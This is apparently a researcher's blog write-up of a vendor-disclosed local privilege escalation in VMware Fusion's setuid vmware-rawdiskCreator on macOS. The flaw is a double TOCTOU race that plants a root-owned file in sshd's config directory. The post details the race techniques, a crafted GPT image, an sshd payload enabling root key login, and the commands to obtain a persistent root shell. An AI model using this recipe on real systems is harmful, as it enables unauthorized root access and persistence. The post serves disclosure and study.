loading . . . C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS ## Introduction
VMware Fusion is one of the most widely deployed virtualization solutions on macOS. It allows users to run virtual machines, manage virtual disk images, and interact with raw physical disks. One of its less known components is a command line utility called `vmware-rawdiskCreator`, which creates VMDK (Virtual Machine Disk) descriptors from physical disk devices. What makes this binary particularly interesting from a security perspective is that it is installed as SUID (or setuid) `root`.
During this research, I identified a double TOCTOU (Time of check Time of use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root privileged file creation operations to arbitrary directories on the filesystem.
Combined with a carefully crafted GPT disk image and a creative choice of target directory, this vulnerability achieves persistent Local Privilege Escalation as `root`.
### Reserach environment (vulnerable version <= 25H2u1)
Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.
## Quick download and installation
You can download VMware Fusion from VMware website (which redirects to Broadcom website).
After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation.
Then you can launch the tool.
## Target identification
During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.
`vmware-rawdiskCreator` has the setuid bit enabled. The binary is owned by `root` (as `s` bit is set), and starts running with `root` privileges, regardless of which user launches it.
The target could easily have been identified using a tool I developed called MTM, which does local attack surface mapping for macOS. It recursively walks the filesystem, identifies Mach-O binaries, captures file metadata and code-signing entitlement.
The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.
The `create` command takes a raw disk device (e.g., `/dev/diskXX`), a partition number, an output path, and an adapter type. It produces two output files:
* <USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
* <USER_DEFINED>.vmdk, the VMDK descriptor (a text file).
These files are created inside a temporary working directory hierarchy that the binary builds under `TMPDIR` (if the environment variable is set).
## Analysis
The goal of dynamic analysis is to run the binary as expected and observe what happens from a filesystem perspective. For this purpose, we can use `fs_usage`.
> I’m using a custom patched version of `fs_usage_ng`, which is itself a patched version of `fs_usage` from Gergely Kalman.
Since we can now see which functions and syscalls are called by the binary, we can begin the first stage of reverse engineering to identify how the paths are constructed, determine whether they can be controlled by the user running the binary or not.
We must therefore reverse the function `sub_10001c9e0()`.
> Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.
`sub_10001c9e0()` starts by taking a process-wide exclusive lock, then calls `_geteuid()` and uses that as the security identity for the temp directory. It keeps two cached paths, selected by the second argument. If a cached path already exists for the current effective UID, it tries `mkdir(path, 0700)`. If that fails with `EEXIST`, it runs `lstat()` and only accepts the directory if all of the following conditions are true:
* It is a directory where `st_uid == geteuid()`.
* Permissions are reduce to `0700`.
> `st.st_uid`, user id of the owner returned by `lstat()`.
If there is no usable cached directory, it searches for a base temp directory. The first argument controls whether it first consults the preference key `tmpDirectory` (`_Preference_GetString()`). After that it tries `_getenv("TMPDIR")`, then hardcoded candidates (including /var/tmp/ and /tmp), then the current working directory via `_File_Cwd()`, and then one more built-in fallback.
> Every candidate is only screened with `_FileIsWritableDir()`.
## Playing with `getenv()`
As shown, we can control the path of the temporary directory by manipulating the `TMPDIR` environment variable. Let’s see what happens with `fs_usage` when this variable is under our control.
## Binary’s behavior
When invoked using `create`, the binary performs the following operations (while running with effective UID 0, `root` privileges):
1. `mkdir` `TMPDIR`/vmware-root/ (mode `0700`).
2. `mkdir` `TMPDIR`/vmware-root/rawdiskCreator<pid>/ (mode `0700`).
3. `open` `TMPDIR`/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (`O_CREAT`).
4. `write` raw MBR + GPT data from the source disk.
5. `open` `TMPDIR`/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (`O_CREAT`).
6. `write` VMDK descriptor text.
7. On error or completion it `unlink` files and `rmdir` directories.
When looking at the execution flow, I realized that several properties of this behavior were relevant to perform a TOCTOU attack.
### `TMPDIR` environment variable is user-controlled
The binary inherits `TMPDIR` from the calling process and uses it as the base for its temporary directory hierarchy. On macOS, `TMPDIR` typically points to a per user directory under /private/var/folders/, but an attacker can set it to any path before invoking the binary.
### `O_NOFOLLOW` on source files
While the binary does use `O_NOFOLLOW` when creating destination files (after dropping privileges for the final VMDK output), it does not use this flag for the intermediate source files created in above steps 3 and 5. This means that if any component of the path is a symlink, the kernel will happily follow it.
> The `O_NOFOLLOW` flag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.
### Files are created as `root`
Because the binary’s effective UID is 0 at the time of file creation, the resulting files are owned by `root` with mode `0600`. This is a powerful primitive as we can create `root` owned files in any directory where `root` has write access (with the exception of repertoires protected by SIP).
### Cleanup on exit
The binary removes its temporary files and directories before exiting. This means that after a successful race, we must freeze the binary (via `SIGSTOP`) before it can run its cleanup routine, or the planted files will be deleted.
## Understanding the TOCTOU vulnerability
The vulnerability is a classic TOCTOU race condition. The binary performs directory creation and file creation as separate, non-atomic operations. Between these operations, an attacker can substitute a directory with a symlink, causing the binary’s subsequent `open()` calls to follow the symlink to a location of the attacker’s choosing.
The attack consists of two sequential TOCTOU swaps:
After both swaps succeed, the path that the binary resolves becomes:
The binary creates <USER_DEFINED>-pt.vmdk as `root` in what it believes is its private temp directory, but the file actually lands in /etc/ssh/sshd_config.d/.
## Enlarging your race window
TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.
### Path-padding symlink chains
Instead of pointing `TMPDIR` directly at a temporary directory, we create a chain of 20 symlinks, each stuffed with ./ and d/../ path components.
tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../... (resolves to tmpdir itself)
tmpdir/d -> (real directory, needed for "d/../" to resolve)
> In XNU, the main pathname resolution function is `namei(struct nameidata *ndp)`. `namei()` converts a pathname into the resolved vnode/inode, and its comment shows the lookup flow. Choose the starting directory, then repeatedly call lookup on path components. At a lower-level the resolver is `lookup()`, which is called from inside `namei()`.
We then set `TMPDIR` to <tmpdir>/s1. When the binary resolves this path, the function `namei()` must traverse thousands of path components across 20 symlink hops. This wastes tens of microseconds of CPU time in kernel space, dramatically widening the race window.
> This technique is inspired by the path padding approach described by Borisov, Johnson, and Dean in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.
It looks very much like USENIX Security 2005, diagram.
The total number of symlink hops must stay within macOS’s `MAXSYMLINKS` (from XNU kernel source bsd/sys/param.h) limit.
Our directory structure is as follows:
* 20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops
Which fit within the 32 hop limit.
### CPU pressure
In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.
One pressure thread is spawned per logical CPU. The combination of path padding and CPU pressure makes the race extremely reliable, during my tests, it consistently won within 1 to 2 (`while` loop) attempts on my host and 25 to 28 (`while` loop) attempts within a VM.
## Stage 1: `RENAME_SWAP` on vmware-root
The first race targets the vmware-root directory. After the binary creates `TMPDIR`/vmware-root/ as a real directory, we need to replace it with a symlink to our staging directory.
We monitor the temp directory using `fstatat()`, waiting for vmware-root to appear.
The key operation here is `renameatx_np()` with the `RENAME_SWAP` flag. This is a macOS specific system call that atomically swaps two directory entries. We precreate a symlink called .swap_sym pointing to our staging directory, then swap it with vmware-root in a single atomic operation.
> `renameatx_np(2)` with `RENAME_SWAP` performs an atomic exchange of two filesystem entries. This is strictly better than a non-atomic `rename` + `symlink` sequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.
If `RENAME_SWAP` fails (for example, if the temp directory and the swap target are on different filesystems), we fall back to a non-atomic `rename` + `symlink` sequence.
After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.
## Stage 2: `rmdir` + `symlink` on rawdiskCreator<pid>/
After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.
The process is similar to Stage 1, but we use `rmdir()` + `symlink()` instead of `RENAME_SWAP`, because the directory to be replaced is freshly created and empty.
Before resuming the binary, we set up a `kqueue` watch on the target directory using `EVFILT_VNODE` with `NOTE_WRITE`. This mechanism allows us to be notified the instant a new file appears in the target directory.
> `kqueue(2)` is the macOS kernel event notification interface. `EVFILT_VNODE` with `NOTE_WRITE` fires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling with `readdir()`, allowing us to freeze the binary almost immediately after it creates the first file.
When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:
The `kqueue` fires, and we immediately `SIGSTOP` the binary again. This is critical as the binary creates <USER_DEFINED>-pt.vmdk first, then <USER_DEFINED>.vmdk. By freezing it after the first file is created, but before the second, we ensure that only <USER_DEFINED>-pt.vmdk lands in the target directory.
## Crafting the payload
The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.
### MBR boot code
According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.
> On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.
### Building a valid GPT image
We cannot simply dump arbitrary data into a file and pass it to the binary. The `vmware-rawdiskCreator` binary validates that the source disk contains a valid GPT partition table with at least one partition. We must construct a compliant GPT image.
Our image builder creates a minimal 10Mb disk image with:
* A protective MBR with our payload in the boot code area.
* A primary GPT header (sector 1) with valid checksums.
* A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
* A backup GPT header and entry array at the end of the image.
The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for partition mode operation. The image is then attached as a virtual disk device using `hdiutil`.
_Command:_
hdiutil attach -nomount payload.img
_Output:_
/dev/diskXX GUID_partition_scheme
/dev/diskXXs1 Apple_HFS
This /dev/diskXX device is passed to `vmware-rawdiskCreator` as the source disk.
### Eliminating newline (`0x0A`) bytes from GPT structures
For reasons that will become clear in the next section, the planted -pt.vmdk file must be parseable as a valid `sshd` configuration file. The configuration format we target uses `#` to denote comments. Our strategy is as follow:
1. The payload (first 440 bytes) contains valid configuration directives, and end with `\n#`.
2. The `#` at the end of the payload makes everything that follows a comment.
3. If there are no more `0x0A` (newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.
Most GPT fields are naturally free of `0x0A`.
The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).
#### Partition unique GUID (16 bytes)
This is a random identifier for the partition. We iterate through candidate values, computing the CRC32 of the full 128 entry partition array for each, until we find one where the resulting CRC contains no `0x0A` byte. Each candidate byte is deterministically derived and clamped away from `0x0A`.
#### Disk GUID (16 bytes)
This identifies the disk itself. We iterate similarly, but this time we must satisfy two constraints simultaneously. The primary header CRC and the backup header CRC must both be free of `0x0A`. The two headers have different LBA values (the backup header’s `myLBA` and `alternateLBA` are swapped), so their CRCs differ.
In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a final scan verifies that zero `0x0A` bytes remain anywhere in the GPT structures.
## Finding the right target or why sudoers.d fails and sshd_config.d works
The exploit gives us the ability to create a `root` owned file in any directory (excluding those protected by SIP). The planted file is always named <USER_DEFINED>-pt.vmdk (derived from the output basename and the -pt.vmdk suffix hardcoded in the binary). The key question is, “Where should we plant this file to achieve privilege escalation?”.
### sudoers.d dead end
The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:
File: /etc/sudoers
...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d
Despite the `#` prefix, this is not a comment. The `#includedir` directive tells sudo to read all configuration files from the specified directory. If we could plant a file containing `%staff ALL=(ALL) NOPASSWD: ALL` in /etc/sudoers.d/, any member of the `staff` group (which includes all local users on macOS) would gain passwordless `sudo` access.
However, `sudo` applies a filename filter to files read via `#includedir`. From the sudoers(5) manual page. When `sudo`reads the sudoers file via `#includedir`, it will skip any files that end in `~` or contain a `.`.
Our file suffix is -pt.vmdk. It contains `.`, so, `sudo` will unconditionally skip it.
Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.
I explored several workarounds:
* LaunchDaemons: /Library/LaunchDaemons/ requires `.plist` extension. `launchctl load` returns “Input/output error” for .vmdk files.
* Periodic scripts: `periodic(8)` checks executability. Our file has mode `0600` (no execute bit), and we cannot `chmod` it.
* PAM: /etc/pam.d/ requires files named after the service (e.g., `sudo`, `login`). A file named -pt.vmdk does not match any service.
* cron.d: Does not exist by default on macOS.
* paths.d: `path_helper` runs as the calling user, which cannot read our `0600` file. And even when readable, paths.d entries are appended (not prepended) to `PATH`, preventing command shadowing.
### The sshd_config.d breakthrough
After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains:
This is a critical difference from sudo’s `#includedir`. OpenSSH’s `Include` directive uses standard `glob(3)` pattern matching. The pattern `*` matches all non hidden files regardless of their extension or the presence of dots in their filename. Our -pt.vmdk file matches this glob and will be included.
> The distinction is subtle but critical. sudo’s `#includedir` applies a custom filename filter (rejecting files with `.`), while OpenSSH’s `Include` uses the system’s `glob(3)` function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.
Furthermore, the `Include` directive appears at the top of sshd_config, before all other options. Since OpenSSH uses first match wins semantics, our directives take precedence. sshd_config uses `#` for comments, just like sudoers. Our `\n#` trick works identically. `sshd` runs as `root` and can read the `0600` file.
I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:
None of these options overlap with our payload, as our payload consists of:
PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#
When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:
Line 1: PermitRootLogin yes (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data> (comment with no newlines to EOF)
Each directive serves a specific purpose:
* `PermitRootLogin yes`, allows SSH login as the `root` user.
* `AuthorizedKeysCommand /bin/cat /tmp/.k`, tells `sshd` to execute `/bin/cat /tmp/.k` to obtain authorized public keys for any connecting user. The `/bin/cat` binary satisfies `sshd`’s requirement as the command is owned by `root` and not writable by group or others. This approach is additive. It does not override `AuthorizedKeysFile`, so existing SSH authentication for other users remains unaffected.
* `AuthorizedKeysCommandUser root`, specifies that the command should run as `root`.
The file /tmp/.k need to be created before running the exploit as it will craft our Ed25519 public key. But first, I verified that `sshd` accepts this configuration by running `sshd` in test mode.
_Command:_
/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'
_Output:_
permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root
All three directives are active, and `sshd` exits with code 0, confirming that the binary GPT data after `#` is correctly treated as a comment.
## Exploitation and proof of concept
### Prerequisites
The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).
### Creation of cryptographic keys
Before running, we prepare the SSH keys that will be used for `root` authentication:
ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k
### Compiling the exploit
cc -O2 -lpthread -o exploit exploit.c
### Running the exploit
File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)
/*
* /\ .-----. /\
* //\\/ \//\\
* |/\| 0 |/\|
* //\\\;-----;///\\
* // \/ . \/ \\
* (| ,-_|coiffeur|_-, |)
* //`__\.-.-./__`\\
* // /.-( )-.\ \\
* (\ |) ' ' (| /)
* ` (| |) `
* \) (/
* Title: VMware Fusion TOCTOU LPE as root (macOS)
* Author: Mathieu Farrell aka @Coiffeur0x90
* Summary: Exploits a double TOCTOU race condition in the suid root binary
* vmware-rawdiskCreator to write an attacker controlled, root owned
* file into /etc/ssh/sshd_config.d/. The planted file configures
* sshd to accept root SSH login using a attacker supplied public key,
* achieving persistent local privilege escalation.
...
### Gaining root access
Once sshd is running (if Remote Login is enabled, or after the next reboot on systems where it is enabled), the attacker can SSH in as `root`:
ssh -i /tmp/.kp root@localhost
The planted configuration causes `sshd` to run `/bin/cat /tmp/.k` as the `AuthorizedKeysCommand`, which returns the attacker’s public key. SSH public key authentication succeeds, and the attacker obtains a `root` shell.
### Persistence
The planted file survives reboots. It will be included by `sshd` on every startup via the `Include /etc/ssh/sshd_config.d/*` directive. The attacker maintains `root` SSH access as long as the file remains in /etc/ssh/sshd_config.d/ and the key file exists at `/tmp/.k`.
## The <USER_DEFINED>.vmdk problem
It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:
* <USER_DEFINED>-pt.vmdk, the partition table (our payload).
* <USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).
If <USER_DEFINED>.vmdk is also created in /etc/ssh/sshd_config.d/, it will be included by sshd’s glob and parsed. This file begins with `# Disk DescriptorFile` (a comment), but subsequent lines like `version=1` are not valid sshd_config keywords. `sshd` might treats unknown keywords as fatal errors and refuses to start.
This is why the `kqueue`-based freeze mechanism in Stage 2 is critical. By detecting the first file creation (the `NOTE_WRITE` event on the target directory) and immediately sending `SIGSTOP`, we freeze the binary after <USER_DEFINED>-pt.vmdk is created but before <USER_DEFINED>.vmdk is written. In all of my test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.
## Conclusion
This research demonstrates how a TOCTOU race condition in a setuid binary can be escalated to full `root` access on macOS. The key ingredients of this recipe were:
* A SUID `root` binary that follows symlinks when creating files in a user-controlled directory hierarchy.
* Path-padding symlink chains to widen the race window to a reliably winnable size.
* An atomic directory swap (`RENAME_SWAP`) for the first race, and a `kqueue`-triggered freeze for precise timing control.
* A crafted GPT disk image with all `0x0A` bytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers.
* The subtle difference between `sudo`’s `#includedir` (which filters filenames containing `.`) and OpenSSH’s `Include` (which uses unrestricted `glob(3)` matching), making sshd_config.d a viable target.
Thanks for taking the time to read this article.
## Timeline
* 2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
* 2026 April 12: First email sent to [email protected].
* 2026 April 12: Second email sent to [email protected].
* 2026 April 12: Start of the investigation by VMware team.
* 2026 April 25: Vulnerability confirmed by VMware team.
* 2026 April 25: I Declined to join the private Bung Bounty program and therefore declined to sign the associated NDA.
* 2026 April 29: VMware has informed me that the process now qualifies as a public disclosure and that they will keep me updated on the rest of the process.
* 2026 May 11: VMware has informed me that the advisory will be published.
* 2026 May 14: The advisory has been published as VMSA-2026-0003/CVE-2026-41702.
https://therealcoiffeur.com/c111000.html